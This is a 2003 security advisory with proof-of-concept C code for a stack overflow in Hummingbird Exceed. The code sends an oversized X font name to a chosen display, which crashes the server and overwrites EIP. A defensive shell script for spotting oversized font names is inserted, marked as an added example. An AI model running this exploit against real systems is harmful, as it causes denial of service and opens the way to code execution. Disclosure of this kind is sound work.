/*

*****************************************************************************

$ An open security advisory #2 - Hummingbird Exceed (All Versions) POC Code

***************************************************************************

1: Bug Researcher: c0ntex@hushmail.com

2: Bug Released: August 2003

3: Bug Impact Rate: Medium / High

4: Bug Scope Rate: Remote / Local

****************************************************************************

****************************************************************************

HQOTD: "How secure do you want it"

http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf

I'll tell you: Much more please sirs.

**************************************

Exceed has several bugs in the way it handles fonts, both locally and remotely.

When a font is requested from an Exceed font database and the font name is either longer than the defined buffer or has been prepared as hostile code, a stack-based overflow occurs. This allows the execution of external commands on the vulnerable system.

Obviously it is also possible to cause a denial of service (DoS) against a machine running Exceed.

By sending an xterm window or any other X application to Exceed and loading a large font name or creating a large window title, we can corrupt the stack and cause Exceed to crash.

Windows Stack Trace:

--------------------

EAX = C0000000

EBX = 00000000

ECX = 40000000

EDX = 00000501

ESI = 41414141

EDI = 0012E138

EIP = 41414141

ESP = 0012E0C8

EBP = 0012E0F0

[-] We can crash a local Exceed server * 2

[-] We can crash a remote Exceed server * many

[-] We can crash Exceed client * many

[-] We can write over EIP address * many

See the POC code below for more information.

Example Run:

------------

[c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib

[c0ntex@darkside exceed]$ ./exceed exploited:0.0

[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com

[-] We are using DISPLAY variable: exploited:0.0

[-] Hang on to your feathers, sending some buffer

..

XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"

after 11 requests (9 known processed) with 0 events remaining.

Remote Font Server:

-------------------

If you use remote font servers with Exceed, one way to check that the server is not trying to exploit your PC is:

$ xlsfonts -display exceed_server:0.0

--------0------

--arial-bold-r---0-0-120-120-p-0-iso8859-1

--arial-medium-r---0-0-120-120-p-0-iso8859-1

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... <-- Here is evil font

...
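The xlsfonts check above can be automated so that a font server is inspected before its fonts are trusted. The following shell script is an added example, not part of the original advisory or of Exceed: it reads an xlsfonts-style font list on standard input and flags any font name longer than a threshold. The 255-byte threshold is an assumption for illustration (XLFD names returned by a sane font server are normally far shorter), and the sample listing is constructed to mirror the output shown above, including one oversized name of the kind the advisory describes.

```shell
#!/bin/sh
# Added example (not from the advisory): detect oversized font names in an
# xlsfonts-style listing. The threshold below is an assumed sanity limit.
MAX_FONT_NAME_LEN=255

# Constructed sample of what xlsfonts might print. The third entry is a
# deliberately oversized name (300 bytes) standing in for a hostile font server.
LONG_NAME=$(awk 'BEGIN { for (i = 0; i < 300; i++) printf "A"; print "" }')
SAMPLE_FONTS="--arial-bold-r---0-0-120-120-p-0-iso8859-1
--arial-medium-r---0-0-120-120-p-0-iso8859-1
$LONG_NAME"

# count_long_fonts: reads font names on stdin and prints how many exceed
# MAX_FONT_NAME_LEN bytes (0 when the listing looks clean).
count_long_fonts() {
    awk -v max="$MAX_FONT_NAME_LEN" 'length($0) > max { n++ } END { print n + 0 }'
}

# report_long_fonts: reads font names on stdin and prints one line per
# oversized name, giving its length and a short prefix so the output stays
# readable even when the name itself is thousands of bytes long.
report_long_fonts() {
    awk -v max="$MAX_FONT_NAME_LEN" '
        length($0) > max {
            printf "SUSPICIOUS font name: %d bytes, starts with %s...\n", length($0), substr($0, 1, 32)
        }'
}

# Against a live display the check would be:
#   xlsfonts -display exceed_server:0.0 | report_long_fonts
# Here it runs over the constructed sample instead.
printf '%s\n' "$SAMPLE_FONTS" | report_long_fonts
```

Piping the live xlsfonts output through report_long_fonts gives a quick yes/no on whether a font server is handing out names that no legitimate font would have; a non-zero count from count_long_fonts is a reasonable trigger for refusing that server until it has been inspected.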

******************************************************************************************************************

$ Hummingbird informed 3 weeks ago, still no reply.

$ Work around: Uninstall Exceed until a patch has been released.

******************************************************************************************************************

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <X11/Xlib.h>

#define BIGBIRD 6001
#define DIRTY_VAL 69
#define MAX_BORDER_LEN 3
#define WIN_TIMER 5
#define WIN_TITLE "simple PoC window - lets shoot birds"

typedef char Birds;

int main(int argc, char *argv[])
{
    Birds nests[BIGBIRD];            /* oversized font name handed to the server */
    Birds egg[2] = { 'A', '\0' };
    Birds *feathersN = NULL;         /* NULL makes XOpenDisplay use $DISPLAY */
    Birds *HABITAT = "DISPLAY";
    unsigned short eggs, chicks;
    unsigned short winW, winH, feathersW, feathersH;
    unsigned long locX, locY;
    unsigned long winBDR;
    Display *feathers;
    Window wingspan;
    XFontStruct *birdcull;

    fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");

    if (argc < 2) {
        fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
        fprintf(stderr, "[-] Usage: %s <display>\n\n", argv[0]);
        return EXIT_FAILURE;
    }

    if (setenv(HABITAT, argv[1], 1) < 0) { /* ;p */
        perror("setenv");
        return EXIT_FAILURE;
    }

    fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);

    /* Build a NUL-terminated font name of BIGBIRD - 1 'A' characters.
       The buffer must start empty, and strncat is bounded by the space left. */
    nests[0] = '\0';
    for (eggs = 0; eggs < BIGBIRD - 1; eggs++)
        strncat(nests, egg, sizeof(nests) - strlen(nests) - 1);

    if ((feathers = XOpenDisplay(feathersN)) == NULL) {
        perror("XOpenDisplay");
        return EXIT_FAILURE;
    }

    chicks = DefaultScreen(feathers);
    winW = ((feathersW = DisplayWidth(feathers, chicks)) / 3);
    winH = ((feathersH = DisplayHeight(feathers, chicks)) / 3);
    locX = DIRTY_VAL; locY = DIRTY_VAL; winBDR = MAX_BORDER_LEN;

    wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
                                   locX, locY, winW, winH, winBDR,
                                   BlackPixel(feathers, chicks),
                                   WhitePixel(feathers, chicks));
    /* Check the returned window, not the function pointer as the original did. */
    if (wingspan == None) {
        perror("XCreateSimpleWindow");
        return EXIT_FAILURE;
    }

    /* XStoreName and XMapWindow do not report failure through their return
       value; the original's NULL comparisons on the function names were dead code. */
    XStoreName(feathers, wingspan, WIN_TITLE);
    XMapWindow(feathers, wingspan);

    fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");

    /* The oversized font name in the font request is what trips the overflow. */
    if ((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
        perror("XLoadQueryFont");
        return EXIT_FAILURE;
    }

    XCloseDisplay(feathers);

    return EXIT_SUCCESS;
}
